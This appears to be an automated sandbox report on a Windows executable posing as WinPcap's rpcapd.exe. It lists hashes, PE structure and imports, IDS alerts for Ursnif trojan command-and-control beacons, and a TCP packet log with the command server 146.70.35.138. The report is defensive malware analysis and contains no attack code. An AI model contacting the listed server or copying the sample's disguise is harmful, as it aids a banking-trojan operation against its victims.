SHA512: | e040b612277556aa5c4b669672f1ff4704bacab562a268c67bf80bdc4a861cdbc74f3a226b0a1d37f61db047228f8ee0b1acbe81accd19d38de28dbb0df94ddd |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZR:+w1lEKOpuYxiwkkgjAN8ZR |
TLSH: | 3DD4BD1A029B2102EBB6CE78A751636C54174CE09B01E2CFC9190DA395E35FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-15:27:17.806871 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
04/22/22-15:27:18.629540 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
04/22/22-15:26:57.401743 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.7 | 13.107.43.16 |
04/22/22-15:27:19.716505 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 15:27:18.544661999 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.544701099 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.544708967 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545233011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545286894 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545330048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545341969 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545378923 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545546055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545604944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545607090 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545617104 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545708895 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545715094 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545759916 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.545798063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545809031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.545855045 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546144962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546216011 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546246052 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546284914 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546309948 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546390057 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546443939 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546451092 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546478987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546499014 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546525002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546571016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546603918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.546608925 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.546619892 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.551635981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.551785946 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.584644079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584686995 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584705114 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584732056 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584752083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.584791899 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.584825039 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585397959 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585433006 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585467100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585475922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585484028 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585501909 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585505009 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585522890 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585545063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585568905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585577011 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585623980 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585632086 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585697889 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.585833073 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.585899115 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.629539967 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.653682947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009407043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009474039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009495974 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009526014 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009552002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009571075 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009596109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009603024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009619951 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009640932 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009650946 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009659052 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009743929 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009845972 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009874105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009891987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009917974 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.009924889 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009931087 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.009968042 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.010001898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050602913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050656080 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050677061 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050703049 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050705910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050729036 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050734043 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050746918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050755024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050774097 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050777912 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050798893 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050817013 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050817013 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050834894 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050852060 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050860882 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050884962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050903082 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050921917 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.050940037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050966978 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.050997972 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051022053 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051047087 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051054955 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051064014 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051079035 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051099062 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051106930 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051116943 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051135063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.051151037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051183939 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.091965914 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.092150927 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.094906092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.094975948 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095000982 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095021009 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095038891 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095058918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095084906 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095102072 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095119953 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095135927 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095144987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095170021 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095186949 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095190048 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095211029 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095220089 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095231056 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095271111 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133063078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133119106 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133138895 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133164883 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133191109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133207083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133232117 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133256912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133274078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133292913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133294106 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133317947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133353949 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133359909 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133361101 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133373022 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133399963 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133399963 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133415937 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133430958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133492947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133517981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133519888 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133536100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133555889 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133560896 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133583069 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133604050 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174278975 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174324989 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174345016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174386024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174391985 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174397945 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174422026 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174431086 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174447060 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174463034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174480915 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174508095 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174540997 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174619913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174645901 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174664974 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174673080 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174710035 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174730062 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174740076 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174756050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174781084 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174798012 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174804926 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174823046 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174835920 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174859047 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174880028 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174916029 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175111055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175142050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175158978 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175165892 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175188065 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175246954 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175266981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175293922 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175318956 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215569973 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215630054 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215651035 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215662003 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215676069 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215689898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215701103 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215715885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215719938 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215744019 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
